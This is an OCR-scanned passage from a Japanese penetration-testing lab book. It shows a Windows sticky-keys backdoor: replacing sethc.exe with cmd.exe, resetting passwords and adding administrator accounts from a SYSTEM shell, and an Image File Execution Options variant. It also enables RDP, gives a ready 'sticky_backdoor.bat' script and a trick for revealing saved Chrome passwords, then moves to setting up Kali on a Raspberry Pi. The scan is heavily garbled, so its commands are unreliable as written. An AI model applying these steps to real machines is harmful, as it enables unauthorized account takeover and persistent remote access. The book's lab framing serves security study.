ファ イル 仮 氏 マ シン 表示 入力 テバ イス へ ヘルプ 


④ 詳細 オブ ショ ソン 


ピア セブ パリ [ビル スタ ー ト アッ プ 修 復 
が に 2 掴 さ れ ま ( し 届 よ 『 全 っ て NPGOuS りり だ あお あ ゃ りゃ 届け て いう 同 葬 を 
』 


Woun そ 生 エ し ュ 才 正 し ます 


以前 の バー ジョ ン に 戻す コマ ンド プロ ソナ ト 
に リア は も っ と て 』 


の た め に ゴマ ツヤ 





図 8.9 | 詳細 オプ ショ ン 」 画面 
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コマ ンド プロ ンプ ト が 表示 され る の で 、 次 の よう に 入力 し ます 。 た だ し 、 
イプ が 見 か け 上 変わ っ て いる こと が ある の で 注意 し て くだ さい (55) 。 


X: \Sources>C: と コア ルル ドリル さ 3) 





し:\> 
C:\>cd D:\M1ndows\System32 通常 は に ドラ イブ に 存在 する 。 
指定 され た パス が 見 つか り ま せん 。 





ミッ は = 
D:\>cd D:\Mindows\System32 実験 環境 で は D ド ライ ブ に 存在 し た 。 


D : \Mindows\System32>copy sethc .exe sethc _o1d.exe 
1 個 の ファ イル を コピ ビー し まし た 。 





D : \Mindows\System32>copy cmd.exe sethc .exe 
sethc .exe を 上 書き し ます か > (Yes/No/A11): y 一 計 多 呈 
1 個 の ファ イル を コビー し まし た 。 





7 の PC を 再起 動 す る 


ドラ 


ブー トメ ディ ア を 取り 出し た 状態 で 、 PC を 再起 動 し ます 。/r オ プシ ョ ン は 再起 


動 を 意味 し 、 す ぐに 再起 動 す る に は /t オ プシ ョ ン で 0 秒 を 指定 し ます 。 


D : \Mindows\System32>shutdown /r /t 9 


8 ログ オン 認証 画面 で コマ ンド プロ ンプ ト を 立ち 上 ける 


ログ オン 認証 画面 が 表示 され た ら 、[Shit] キー を 5 回 押し ます 。 す る と 、 コ マ 


5 :HDD や SSD と いっ た スト レー ジ は 複数 の パー ティ ショ ン が 存在 し ます 。 スト レー ジ 上 の パー 
ティ ショ ン の うち 、 ド ライ ブ 文 字 を 割り 当て た も の が 、 エ クス プロ ー ラ ー 上 で ドラ イブ と し て 扱 
われ ます 。 つ まり 、 エ クス プロ ー ラ ー に は 、| スト レー ジ 上 で 領域 を 割り 当て て いな いも の 」| 領 
域 を 割り 当て て いて も 、 ド ライ ブ 名 を 割り 当て て いな いも の 」 は 表示 され ませ ん 。 こ うし た 差異 


に より 、 ド ライ プ の ずれ が 起こ り ま す 。 
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ンド プロ ンプ ト が 立ち 上 が り ま す 。 


⑨) パ スワード を 上 書き し た り 、 ユー ザー を 作成 し た りす る 

後 は net user コ マン ド を 用 いま す 。 こ の 時 点 で SYSTEM 権限 を 得 て い る の で 、 
既存 の ユー ザー 名 と 新しい パス ワー ド を 指定 すれ ば 、 パ スワ ー ド を 上 書き で きま 
す C6)。 

/add オ プシ ョ ン を 付け れ ば 新規 に ユー ザー を 追加 で きま す 。 さら に 、net 
localgroup コ マン ド で その ユー ザー に 対し て 管理 者 権限 を 付与 で きま す 。 


C:\M1ndows\system32>whoam ュ 1 


nt authority\system SYSTEM 権 限 で ある 。 





既存 の target1 ユ ー ザ ー の パス ワー ド を “bypass "で 上 書き する 。 
C:\Mindows\system32>net user target1 bypass 


The command completed successful1y . 





“bypass" と いう ユー ザー を 作り 、 パ スワ ー ド は "bypass "に し た 。 
C:\Mindows\system32>net user bypass bypass /add 


The command completed successful1y. 


C:\Mindows\system32>net 1ocalgroup administrators bypass /add 
The command completed successful1y . pass ユ ー ザ ー に 管理 者 権限 を 与え る 。 





右上 の [x] ボタ ン を 押し て 、 コ マン ド プ ロン プ ト を 閉じ ます 。 


⑩ 新 し い パ スワ ー ド で ログ オン する 

ログ オン 認証 画面 に て targetl ユー ザー が 表示 され て いる の で 、 元 の パス ワー ド 
を 人 力 し て み ま す 。 し か し ログ オン で きま せん 。 新た に 設定 し た パス ワー ド 
("bypass ) を 入力 する と ログ オン で きま す 。 


6 : Microsoft ア カウ ント の ユー ザー を 指定 し て 、 net user コマ ンド で パス ワー ド を 上 書き し よう 
と する と 、8646 エ ラー が 発生 し ます 。 これ は シス テム の 動き ほ と し て は 正しい で す 。 も し Microsoft 
アカ ウン ト の パス ワー ド が リセ ッ ト さ れ た り 、 上 書き され だ たり し て し まえ ば 、 攻撃 者 は ロー カル 
環境 だ け で な く ク ラウ ド 環 境 に まで 侵入 で き て し まう か ら で す 。 


https//4sysops.com/archives/how-to-reset-a-microsoft-account-Dassword-connected-account/ 
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1⑪ 追 加 し た ユー ザー の 権限 を 確認 する 
再起 動 す れ ば 、 ロ グ オ ン 認 証 画面 に bypass ユ ー ザ ー も 表示 され ます ( 図 8-10)。 
bypassS と いう パス ワー ド で ログ オン で きま す 。 


| 本 windzws 7 sP1(zbrt。 EN) (イン スト ー ル 直後 ) [実行 中 ] - Oracle VM VitualBc ーー 
ーーーーーーー ーーーーーーーーー ーーーーーーーーーーー ーーーーーーーー ーー ト | 
| ファ イル 令 組 マシ ン 家 示 入力 テバ イス へ ヘルプ 

| 』「 租 R 
| 


半 . VVITdOWS / PrOfessior 


罰 ⑨ ば グロ 回 吾 介 ⑳ 可 Cr・a 





図 8.10 ユー ザー が 追加 され て いる 


初回 ログ オン な の で デス クト ッ プ が 表示 され る まで に 春 十 時 間 が か か り ま す 。 
本 当 に 管理 者 権限 に 属し て いる か どう か を 確認 する た め に 、「 コ ン ビ ュー タ の 管 
理 | 画面 を 表示 し ます 。 こ の 画面 で 「 コ ンピュータ の 管理 ] > 「 シ ステ ムツ ー ル 」 
> ロー カル ユー ザー と も グルー デ 」 ラ シラ 『 エー ザー」 を 選択 する と 、 中 天 に ユー ザー 
が 列挙 され ます 。 調べ た い ユ ー ザ ー を 右 ク リッ ク し て プロ パテ ィ を 選択 し ます 。 
所 属す る グル ー プ 」 の と ころ に 「Administrators] が あれ ば 、 管理 者 権限 の グル ー 
プ に 属し て いる こと を 意味 し ます ( 図 811) 。 
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EE Windcws 7 SP1(32bt。 EN) ( イ : 後 ] [ 天 中 ] - く 
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図 8.11 ユー ザー の プロ パテ ィ 画 面 


幼 後 始末 を する 


以上 で 目的 を 達成 し まし た が 、[Shiftl キー を 5 回 押し た と き の 動 作 を 元 に 戻し 
た けれ ば 、 ブ プー トメ ディ ア か ら コ マン ド プ ロン プ ト を 立ち 上 げ て 、" 辛 Windows 
\System32" ディ レク トリ 配下 で 次 の コマ ンド を 実行 し ます (バッ クア ッ プ し た 
ファ イル か ら の 上 書き )。 


>copy Ssethc_old.exe sethc .exe 
な ぜ 、 ま た ブー トメ ディ ア か ら の コマ ンド プロ ンプ ト を 用 いて いる の か と いう 


と 、'sethc.exe' は "cmdexe (の コビー) で あり 、 デ フォ ルト で は 削除 が 許さ れ て 
いな いか ら で す 。bypass ユ ー ザ ー (管理 者 権限 グル ー プ に 属す る ) で コマ ンド プ 
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ロン プ ト を 立ち 上 げ て "sethc.exe "ファ イル の ACL (*7) を 確認 し て み ま す 。 


| 確か に 存在 する 。 


上 書き する の で y を 入力 する 。 


品 現在 の ACL を 表示 する 





つま り 、Administrators に は 読込 許可 し か 与え られ て お ら ず 、 削 除 で きま せん 。 
一 方 、 SYSTEM 権限 で あれ ば フル コン トロ ー ル 許可 が 与え られ て いる の で 、 削 除 
で きま す 。 つ まり 、 プ ブート メデ ィ ア か ら の コマ ンド プロ ンプ ト 上 で あれ ば 、 元 の 
"sethc.exe で 上 書き で きる わけ で す 。 


7 : ACL (Access Contrrol List) と は 、 ア クセ ス 制 御 リ スト の こと で す 。Windows シス テム 上 に 
は 様々 な オプ ジェ クト (ファ イル や フォ ル ダ ー、 サ ービス 、 レ ジス トリ な ど ) が 存在 し 、 そ れ ら 
に は アク セス 権限 が 設定 され て いま す 。 こ うし た アク セス 権限 の 集合 体 が ACL に な り ま す 。 
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4 ジジ クル る 3 リル た た す : と (マツ A ン ルン タル リル た さ ) 





この 項 で は cmd.exe に アク セス する 処理 を 実行 し ます 。 そ の 際 に 、 シ ステ ム 
に よっ て は ウイ ルス 検知 が 反応 する こと が あり ます 。 そ の 際 は 、 ウ イル ス と は 無 
関係 で ある た だ ため 、 ア ンチ ウイ ルス の リア ル タ イ ム 保 護 を 解除 し て お いて くだ さい 。 


単 績 に cmd.exe で sethc.exe を 上 書き する と 、sethc.exe と cmdexe の MD5 


の ハッ シュ 値 が 一 致し て し まい ます ( 図 8.12)。 つ まり 、 何 ら か の 不正 が 行わ れ て 、 


'Sethc.exe と cmdexe が 同じ ファ イル に な っ て いる こと を 示唆 し ます 


C:\Mindows\system32>Certuti] -hashfile C:\M1indows\system32\sethc .exe MD5 
C:\Mindows\system32>Certuti] -hashfile C:\Mindows\system32\cmd.exe MD5 





図 8-.12 "sethc.exe' と "cmd.exe'" の MD5 の ハッ シュ 値 


上 書き を せ ず に レジ スト リ を 書き 換え る こと で 、 同 等 の 攻撃 を 実現 する に は 次 


レジ スト リ を 書き 換え て パッ フ ド ア を 設置 する 


うこ と で 、 あ る プロ グラ ム を 実行 し よう 
と し た と き に 他 の プロ グラ ム を 実行 させ る こと が で きま す 。 上 具体 的 に は 、 レ ジス 
トリ の HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image 
File Execution Options 直下 に ター ゲッ ト (すり 共 え られ る 了 行 フ ァイル 名 ) 
キー を 作り ます 。 そ の キー に 文字 列 (REG_SZ) を 作成 し 、 名 前 に "Debugger 、 
デー タ に すり 奉 え る 実行 ファ イル 名 を 設定 し ます 。 これ に より 、 プ ログ ラム の す 
り 共 え が 実 現 で きま す 。 こ れ を 応用 し て 、Ssethc.exe を 実行 し よう と し た と き に 


Cmdexe を 実行 きせ られ ます 


Image File Execution Options 機能 を 使 
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① レ ジス トリ を 書き 換え る 
管理 者 権限 で ログ オン し て 、 コ マン ド プ ロン プ ト を 起動 し ます 。 
コマ ンド プロ ンプ ト で 次 を 実行 し ます ("8)。 





(② ユー ザー を 確認 する 
[Shift] キー を 5 回 押し 、 コ マン ド プ ロン プ ト を 起動 し ます 。 コ マン ド プ ロン プ 
ト で whoami コ マン ド を 実行 する と 、 ロ グ オ ン ユ ー ザ ー で ある こと が わか り ま す 。 





3 権限 を 確認 する 

再起 動 し て 、 ロ グイ ン 画 面 を 表示 し ます 。 そ し て 、【[Shift] キー を 5 回 押す と 、 
コマ ンド プロ ンプ ト が 起動 し ます 。whoami コ マン ド を 実行 する と SYSTEM 権限 
で ある こと が わか り ま す 。 





8 : 管理 者 権限 の ユー ザー に 、 コ マン ド プ ロン プ ト を 含む バッ チ フ ァイル を 実行 で きれ ば 同じ 効 
果 が 得 ら れ ま す 。 
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(④ シ ステ ム 上 の ファ イル を 探す 

'explorer を 人 力 す る と 、 タ スク バー が 下 に 表示 され ます 。 バ ー が 隠れ た 場合 は 
[Win] キー で 再 表示 で きま す 。 フ ァイル を 探す た め に スタ ー ト メニ ュー か ら マ イ 
コン ビュ ー タ ー な ど に アク セス し よう と し て も 、The server process could not be 
started because the contigured identitY iS incorrect. Check the username and 
password と いう エラ ー メ ッ セ ー ジ が 表示 され ます 。 そ の た め 、 コ マン ド プ ロン 
プ ト で cd コマ ンド や dir コマ ンド を 駆使 し て 探す し か あり ませ ん 。 


5 )RDP 接続 で きる よう に する 
この テク ニッ ク は RDP 接 続 中 で も 有効 


で す 。 管理 者 権限 が あれ ば 、 レ ジス トリ 
か ら 、 外 部 か ら の RDP 接 続 で アク セス で きる よう 


よう に 設定 で きま す C9⑨)。 


C:\Mindows\system32>REG ADD "HKLM\System\CurrentContro1Set. 」 
\Control1\Termina1 Server" /v fDenyTSConnections / て REG _DMORD /d 9 
Value fDenyTSConnections exists, overwrite(Yes/No)? y 

The operation completed successfu11y. 


C:\Mindows\system32>REG ADD "HKLM\SYSTEM\CurrentContro1Set. | 
\Contro1\Termina1 Server\MinStations\RDP-Tcp" /V 
UserAuthentication / て REG_DMORD /d 9@ 

The operation completed successfu11y. 


C:\Mindows\system32>netsh firewa11 set service type = ・! 
remotedesktop mode = enable 

(netsh advfirewa11 firewa11 を 使う べき と いう メッ セー ジ ) 
Ok. 


C:\Mindows\system32>netsh advfirewa11 firewa1] set rule group = ・」 


9: ター ゲッ ト が 日 本 語 化 さき れ た Windows で あれ ば 、 netsh advfirewal コ マン ド の 実行 時 に 
group 名 を 日 本 語 で 指定 し ます 。 


C: WMindows\system32>netsh advfirewa11 firewa11 set rule group= ・」 
"リモ ー ト デス クト ッ プ " new enable=yes 
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"Pemote desktop" new enable = Yes 
ファ イア ウォ ー ル で リモ ー ト デス クト ッ プ 接続 を 有効 化す る 。 





Updated 3 rule(s) . 
Ok . 


C:\Mindows\system32>net start TermSerVv1ce 
The Remote Desktop Serv1ices SerV1ce 1S Sstart1ng 
The Remote Desktop Services Serv1ice was Started SuccessfTul1y . 


RDP 接 続 時 に 、 ユ ー ザ ー ア イコ ン を 選ぶ ログ オン 画面 が 表示 され れ ば 、【[Shift」 


き 
ーー 


で コマ ンド プロ ンプ ト を 起動 で きま す ( 図 813)。 





図 8.13 HDP 接続 時 に コマ ンド プロ ンプ ト を 起動 する 


6 ハッ ツン ュ 値 を 確認 する 
sethc.exe と cmdexe の MD5 の ハッ シュ 値 を 確認 する と 、 一 致し て いな いこ 


と が わか り ま す ( 図 8.14)。 つ まり 、 異 な る ファ イル で ある こと を 意味 し ます 
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C:\Mindows\system32>certuti] -hashfile C:\Windows\system32\sethc .exe MD5 
C:\MWindows\system32>Certuti] -hashfile C:\Mindows\system32\cmd.exe MD5 





図 8.14 "sethc.exe" と "cmd.exe'" の MD5 の ハッ シュ 値 


な お 、 レ ジス トリ を 元 に 戻す に は 次 の よう に 実行 し ます 。 


C:\Mindows\system32>REG DELETE "HKLM\SOFTMARE\Microsoft\Mindows 
NT\CurrentVersion\Tmage File Execution Options\sethc .exe" 
Permacent1y delete the registry key HKEY LOCAL MACHTNE_」 
\Microsoft\Mindows NT\CurrentVersion\Tmage File Execution | 


Options\sethc.exe (Yes/No)? y 一読 区 5 員 
The operation completed successful1y . 


Chrome で パス ワー ド の マス ク を 解除 する 


過去 に 認証 し た こと が ある 認証 画面 を Chrome で 表示 し た と き 、 パ スワ ー ド 人 入 
力 欄 に マス ク さ れ た パス ワー ド が 自動 で 入力 され ます 。 

カー ソル を パス ワー ド 人 入力 欄 に 当て て 、 石 クリ ッ ク の | 保存 し た パス ワー ド を 
すべ て 表示 」 を 選ぶ と 、「chrome://settings/passwords」 に 転送 され ます 。 す る 
と 、Google ア カウ ント が 保存 し て いる パス ワー ド が 一 覧 表示 され ます 。 し か し 、 ま 
だ パス ワー ド は マス ク さ れ て お り 、 マ スク を 外す に は Windows の パス ワー ド が 必 
要 に な り ま す 。 

ここ で は パス ワー ド さ えも 必要 と し な い 方 法 を 紹介 し ます 。 Web ペー ジ 上 で 右 
クリ ッ ク し て 「 検 証 ] を 選ぶ と 、 デ ベロ ッ パ ー ツ ー ル が 開き 、HTML ソ ー ス が 表 
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示さ れ ま す 。 パ スワ ー ド 入力 欄 に 対応 し た 「input type='password'| と いう 人 箇所 
が あり ます 。 こ れ を 「input type="'text'」 ([input type='* |」 の よう に 適当 な 文字 
列 を 指定 し て も よい ) に 変更 し ます 。 す る と 、 マ スク が 消え て 、 パ スワ ー ド が 表 
示さ れ ま す 。 


バッ ク ド ア 作成 用 の バッ チ フ ァイル 


ここ で 解説 し た 一 連 の コマ ンド を バッ チ フ ァイル に する と 、 次 の よう に な り ま 
す 。 こ の バッ チ フ ァイル を ター ゲッ ト 端 末 上 で 実行 で きれ ば 、 バ ッ ク ド ア が 設置 
され 、 さ ら に 外部 か ら RDP 接 続 で きま す 。 


"sticky_backdoor.bat" ファ イル 


REG ADD "HKLM\SOFTMARE\Microsoft\Mindows NT\CurrentVersion\Tmage -」 
File Execution Options\sethc .exe" /v Debugger /t REG SZ /d 
"C:\w1ndOows\SyStem32\Cmd.exe" / 千 


REG ADD "HKLM\System\CurrentContro1Set\Contro1\Termina1 Server" 
/v fDenyTSConnections /t REG DMORD /d @ /f 

REG ADD "HKLM\SYSTEM\CurrentContro1Set\Contro1\Termina1 
Server\MinStations\RDP-Tcp" /v UserAuthentication /t REG_ DMORD | 
/d 9 /f 


netsh firewal1 set service type = remotedesktop mode = enable 
netsh advfirewa11 firewa11 set rule group="remote desktop" new 


enable = Yes 


net start TermService 


REG ADD コ マン ド の ff オプ ショ ン は 、 す で に レジ スト リキ ー が 存在 し て も プ 
ロン プ ト に 返さ な い 強 制 的 な 上 書き を 意味 し ます 。 
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EE 
ハッ キン グ ・ ラ ボ の 拡張 


* Us 


物理 デバ イス の 追加 






これ まで は 主 に 仮想 環境 を 活用 し て ハッ キン グ ・ ラ ボ を 構築 し て さま し た 。 
し か し 、 仮想 環 境 と 物理 デバ イス を うま く 組 み 合わ せる こと で 、 ハ ッ キ シグ ・ 
ラボ で 実現 で きる 実験 の 幅 を 広げ られ ます 。 また 、 リ スク を 分 散 し た り 、 作 業 
の 効率 化 を 促進 し た り で きま す 。 

本 草 で は 、 ハ ッ キ ング ・ ラ ボ に 物理 デバ イス で ある PHaspberry Pi と NAS 
を 導入 する 方 法 に つい て 解説 し ます 。 こう し た 物理 デバ イス を 所 有 し て いな く 
て も 、 こ れ ら の 活用 法 を 知っ て お け ば 別 の 場面 で 席 用 で きる は ず で す 。 


9-1 | ハッ キン グ ・ ラ ボ に Raspberry Pi を 導入 する 





Raspberry Pi と は 、 教 育 目 的 に 開発 され た 、 手 の ひら サイ ズ の コン ビュー タ で 
す 。 内 蔵 ハ ー ド ディ スク を 持た ず 、microSD カ ー ド を 装着 し て 使用 し ます 。 電子 
工作 と も 非常 に 相性 が よく 、[「 ラ ズバ パイ 」 と いう 愛称 で 呼ば れ て いま す 。 
Ei 

Raspberry Pi 一 leach, Learn、and Make with Kaspberry Pi 


| https:/ wwwz rasDberryDi.org/ 
2 ゴム ゴム 0 メ ュ っ ム っ ム くっ っ Ti 


沙 ハッ キン グ ・ ラ ボ で の 活用 例 
Raspberry Pi は 、 次 の よう な 特徴 を 持ち ます 。 


s 小さ い 制 に パワ リフ ル 。 

* 広 < く 利用 され て いる た め 情 報 が 多い 、。 
* 値段 が 安い 。 

* 持ち 運び し や すい . 

* ハー ドウ ェ ア を 容易 に 制御 で きる 。 


ハッ キン グ ・ ラ ボ に お いて も 、 次 の 場面 で 活躍 し ます 。 


プロ グラ ミン グ 
ARM プロ セッ サー を 備え て いる の で 、ARM の アセ ンプ リー 言語 の 学習 用 途 に 
向い て いま す 。 ま た 、C や Python の プロ グラ ミン グ 環 境 と し て 使用 する の も よい 


Sa 給 困 の 


ハッ キン グ 
物理 的 な 特徴 を 活か し て 、 従来 の PC で は 困難 だ っ た 攻撃 を 実現 で きま す 。 詳細 
に つい て は 後述 し ます 。 


Raspberry Pi に Kali を イン スト ー ル する 
Raspberry Pi で 使え る OS は 多々 あり ます 。 一 般 に は 、Raspbian OS (Raspbian 
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と 略す ) が 採用 され ます 。Raspbian は 、 Raspberry Pi が 公式 に サポ ボー ト し て いる 、 
Debian ベー ス の OS で す 。Raspberry Pi の ハー ドウ ェ ア 和 向け に 最適 化 さ きれ て いま 
す 。Python、]ava、Scratch、Mathematica な どの ソフ トウ ェ ア が デフ ォ ル ト で イ 
ンス トー ル さ れ て いま す 。 

Kali の 公式 サイ ト で は 、Raspberry Pi 向け の Kali (Kali Pi と す ) が 提供 され 
て いま す ( 図 9.1)。 つ まり 、 こ れ ま で 本 書 で 紹介 し た Kali を 用 いた ハッ キン グ を 
Raspberry Pi で も 実現 で きま す 。 し か し 、 ス ペッ ク の 面 で は 従来 の PC に 劣る た 
め 、 重 い 処 理 に は 向き ませ ん 。 





娘 9-1 Raspberry Pi に Kali Pi を 導入 し た 


ここ で は 、Raspberry Pi に Kali Pi を イン スト ー ル する 手順 を 解説 し ます 。 
①Kali Pi を タダ ウン ロー ド す る 

次 の URL に アク セス し ます 。 | Raspberry Pi Foundation] と いう 項目 が ある の 
で 、 こ こ を 押す と 、Kali Pi の ダウ ン ロ ー ド リン ク が 表示 され ます ( 図 92)。 


Kali ARM image downloads for Yarious deyices 


https:// wwwoftensive-security.com/ kali-linux-arm-images/ 
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いい 
MFPERSIUE Course CertifcaUons Online Labps Penetradon Testing Profects IOA Apowt 
* イ + 
ビ 


Kali ARM image downloads for various devices 


We have a『ascination with ARM hardware. and often find Kall uery useful on Small and portable devices. 〇 yer time. we haue BMM Kali Linux 『Gr a wide 
selection of ARKM hardwsare and offered these imases for public dovmload. The srrints used to な enerate these images て an be found on Github- These imaRes 
havc g Ocfoult possword ol *toor amd may havc で cncrated S5H host keys, Thcsc imoEcs gr で buk us5inE hc "kalirrolling" rcposKtoric5. Sn contain Wheir 


で SP ぐ Ctiyc kerncl sourccs In CoS で yOM nc で で to cormpllc cxtra rvcrs, or othcr kcrnel dcpecmdcnt codc。 


CompuLab・Utllte & TnmSllce 
Chromebooks - HP, Samsung & Acer 
SolidRun - CuBox 


RaspberryPi Foundation 





Version SHA2363Sum 
Kali Limux 2018. さ SI6 で や SOLO1(】 4857 ma シン T コ 1ecc norhD6 や 3】5005mdes3 155) て 5 8 
Rapberry 由 
2 and } 


Kali Linwx 33C41p904523of 39cdslCWGT こ 5G8438395G1< も 953c99383fec2f で 5c う 3 て fbCG1 


2018. さ 2141eSLtcS5He9291S3eCW で 32C9Pt26 コ 49< (59<taToCrd5 コ dEeBc7S387f 日 





図 9.2 Kali Pi! の ダウ ン ロ ー ド サイ ト 


本 書 で は Raspberry Pi 3 を 用 いる た め 、|Kali Linux RaspberryPi 2 and 3] ( こ 
こ で は kali-linux-2018.2-rpi3-nexmoniimg.xz ファ イル ) を ダウ ン ロ ー ド し ます 。 
ダウ ン ロ ー ド 後 、7zip で 解凍 し ます 。 する と 、Kalii の イメ ー ジ ファ イル (kali-linux- 
2018.2-rpi3-nexmon.img′ ファ イル ) が 出力 され ます 。 


2②)microSD カー ド を フォ ー マ ッ ト す る 

KalliPi の イメ ー ジ ファ イル は 約 68G バ イト な の で 、 こ こ で は 32G バ イト の 
microSD カ ー ド を 用 意 し まし た 。 SDFormatter で microSD カ ー ド を フォ ー マ ッ ト 
し ます 。 


サー ガード プ チキ ーママ メル ゲ ケー 


https://wwwrsdcard.org/jp/downloads/formatter_4/ 
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、 消 去 設 定 に 「 上 書き フォ ー マ ッ ト 」、 論 理 サ イ 
ドラ イブ に は microSD カード を 指定 し ます ( 図 
と を 確認 し ます 。 容 


[オプ ショ ン 設 定 ] ボタ ン か ら 


ズ 調 整 に ION」 を 指定 し ます 。 
9.3)。 マ イコ ンピュータ ー を 開き 、 ド ライ ブ に 間違い が な いこ 


量 に も より ます が 、 か な り 時 間 が か か り ま す 。 


| SeeoxE り こ ミ テ | 


て われ ま まこ デー3| は すべ 
| SD 80HG か た DSUDGEENG30-40 の 


王 還 


Pe: ーー = 
329.8 日 Vsaume Lstel : 


フォ ー マ ッ ト オ ゴブ ショ ン < 








図 9.3 microSD カ ー ド の フォ ー マ ッ ト 


3microSD カー ド に イメ ー ジ ファ イル を 書き 込む 
Win32 Disk Imager を Administrator 権限 で 起動 し ます 。 


Win32 Disk Imager 
https:// sourceforge.nct/projects/ win32diskimager/ 





Image File に Kali Pi の イメ ー ジ ファ イル 、Device に microSD カ ー ド の ドラ イブ 
を 指定 し て 、[Write] ボタ ン を 押し ます ( 図 94)。 こ れ に より 、microSD カ ー ド 


に イメ ー ジ ファ イル が 書き 込ま れ ま す 。 


テー30182Tpi3-eecmae isali-| rp-2018 Peexmee me | 国 本 M 


Ccpy cpy 貼 MDS Hash: 


Ccr で こう 


Vesiw085 | cwpwl EK 





図 9.4 Kali の イメ ー ジ ファ イル の 書き 込み 


683 
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4)Kali Pi を 起動 する 

microSD カ ー ド を Raspberry Pi に 装着 し ます 。 そ し て 、 キー ボー ド 、 マ ウス 、 モ 
ニタ ー を 接続 し ます 。 有線 LAN に 接続 する の で あれ ば 、LAN ケー ブル も 接続 し て 
お きま す 。 最後 に 、 電源 ケー ブル を 接続 する と 、 Kali Pi が 起動 し ます 。 起動 ログ 、 
ログ イン 画面 が 表示 され る こと を 確認 し ます ( 図 9-5). 





図 9.5 HDMI モニター で ログ イン 画面 を 表示 し た 


ログ イン する と 、 デ スク トッ プ が 表示 され ます 。 Kali 仮 租 マ シン に イン スト ー ル 
し た Kai と は イン ター フェ ー ス が 若干 異な っ て いま す 。 


交 Kali Pi を 運用 する た め の 大 本 設定 


操作 性 や 効率 性 の 観点 か ら 、 次 の 流れ で Kali Pi を 設定 し ます 。 


1 ネッ トワ リーク を 通じ て SSH で アク セス で きる よう に する 。 
2 り リモ ー ト デス クト ッ プ で きる よう に する 。 
3. GUI 探 作 で 各種 設定 を する 。 
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@ ネッ トワ ー ク を 設定 する 

Raspberry Pi 3 は 有線 LAN ア ダ プ ター を 備え て いる の で 、LAN ケー ブル を 接続 
し まし た 。 こ の 状態 で Kali Pi を 起動 する と 、 動 的 に IP アド レス が 割り 振ら れ ま 
す 。 つ まり 、LAN 内 の 別 の 端末 か ら ア クセ ス で きま す 。 


root@⑩ka11:<# 1fconfig LAN ア ダ プ ター を 1 つ 内 蔵 し て いる 。 
eth9: 和 †1ags=4163<UP , BROADCAST , RUNNING , MULTICAST> mtu 1599 


inet 192.168.1.4 netmask 255.255.255.9 broadcast .」 
192 .168.1.255 

inet6 249d: の 9:2b97 : cc99 : ba27 : ebff:fe78:81b4 prefixlen .」 
64 scopeid 9x9<global> 

inet6 fe89: : ba27: ebff:fe78:81b4 prefixlen 64 scopeid .」 
9x209<11nK> 

ether Db8:27:eb:78:81:b4 txqueuelen 1999 (Ethernet) 

RX packets 818 bytes 191276 (98.9 KiB) 

RX errors 9 dropped 9 overruns 9 frame 9 

TX packets 215 bytes 23784 (23.2 KiB) 

TX errors 9 dropped 9 overruns 9 carrier の 9 col1isions 9 





1o: 和 †]ags=73<UP , LOOPBACK , RUNNING> mtu 65536 
1net 127.9.9.1 netmask 255.9.9.9 
1net6 ::1 prefixlen 128 scopeid 9x19<host> 
1oop txqueuelen 1 (Local] Loopback ) 
RX packets 9 bytes 9 (9.9 B) 
RX errors 9 dropped 9 overruns 9 frame 9 
TX packets 9 bytes 9@ (9.9 B) 
TX errors 9 dropped 9 overruns 9 carrier 9 col1isions 9 


無線 LAN ア ダ プ ター を 1 つ 内 蔵 し て いる 。 
wlan9: flags=4999<UP , BROADCAST ,MULTICAST> mtu 1599 


ether 9e:33:72:93:97:3e txqueuelen 1999 (Ethernet ) 

RX packets 9 bytes 9 (9.9 B) 

RX errors 9 dropped 9 overruns 9 frame 9 

TX packets 9 bytes 9 (9.9 B) 

TX errors 9 dropped 9 overruns 9 carrier 9 col1isions 9 
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Raspberry Pi 3 は 無線 LAN ア ダ プ ター を 内 蔵 し て いま す 。 特に 設定 する こと な 
く Kali Pi は 無線 LAN ア ダ プ ター を 認識 し て お り 、GUI 揉 作 で 無線 LAN に 接続 で 
さま す 。 

デス クト ッ プ の 右上 か ら 接 続 す る AP を 選び ます 。 一 度 接続 すれ ば ネッ トワ ー 
ク プ ロフ ァイル が 記録 され 、 目 動 で 接続 し ます ( 図 96)。 


Ethernet Network 


davice nOt rnarnaged 


WiLFI Networkes 
_2GEXT 


DisconnaCL 


VPN ConnQctiOPns 
Connect to Hidden Wi-H Network..。 
Create New Wi-H Netwak..- 





図 9-6 無線 LAN に 接続 し た と ころ 


@ SSH で 外部 か ら ロ グ クイ ン で きる よう に する 

Raspberry Pi 用 の キー ボー ド や マウ ス で 操作 する の は 手間 が か か る の で 、 リ 
モー ト か ら 操 作 で きる よう に し ます 。 最 新版 の Kali Pi で は デフ ォ ル ト で SSH サ ー 
バー が 稼働 し て お り 、 特 別 な 設定 を せ ず に root で ログ イン で きる よう に な っ て い 
ます 。 LAN 内 の 端末 か ら SSH ク ライ アン ト (ここ で は Tera Term) を 使っ て 、 
root で ログ イン で きま し た ( 図 9-7)。 

SSH 経由 で の 操作 が メイ ン で あれ ば 、Kali Fi 側 で 日 本 語 キ ー ボ ー ド の レイ アウ 
ト を 登録 する 必要 が あり ませ ん 。 
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四 、192.168.1.4 - Tere Term * 
| ファ イ JLKF) 綴 先 [E) 笠 十 (5) DL EEE ヘッ ルプ (H) 
Lirux kali 4.9.80-Rg4son-y7 前! Jor 26 17:45:16 CT 


ニー 開 引 E に 短 u た d wi ト 「 呈 Ka 改 じ が SVStgn ae Tree Sottware: 
1 キ で NN を ず al 
『 


Kali NL/Lin 


pgrm itted hy acp 





凶 9-/ lera lerm で ログ イン し た と ころ 


外部 か ら の アク セス を 老 慮 する と 、 静 的 IP アド レス を 設定 し た 方 が 運用 し や す 
いで し ょ う (1)。 動 的 IP アド レス で あれ ば ぱ ば 、 ス マ ホ ア プ ブリ の Fing で Ping ス イー 
プ し た り 、Raspberry Pi 上 の Terminal で iiconfig コ マン ド を 実行 し た りす れ ば ば 、 
IP アド レス が わか り ま す 。 ここ で は 、SSH 接続 する た びに IP アド レス を 確認 する 
と いう 連用 方 法 を 採用 し ます 。 


で vi で 方向 キー を 押す と ABCD に な る の を 解消 する 

Kali Pi の vi で は 、 方向 キー に ABCD が 割り 当 
サー トモ ー ド 時 に カー ソル を 移動 し よう と し て 方 向 キ ー を 押す と 、ABCD が 入力 
され て し まい ます 。 方 向 キ ー の 代わ り に [hl」、[[ 員 、Lk」、 上 上 | キー を 使え ば よい の 
で す が 、 不 慣れ な 場合 は 方 向 キ ー を 使い た いで し ょ う 。 ま た 、 イ ン サ ー ト モー ド 
に 移行 し て も 、|- INSERT -」 と 表示 され ず 、 わ か り に くい と いえ ます 

これ は ui 互換 モー ド に な っ て いる こと が 原因 で す 。 互換 モー ド を 解除 する に は 、 
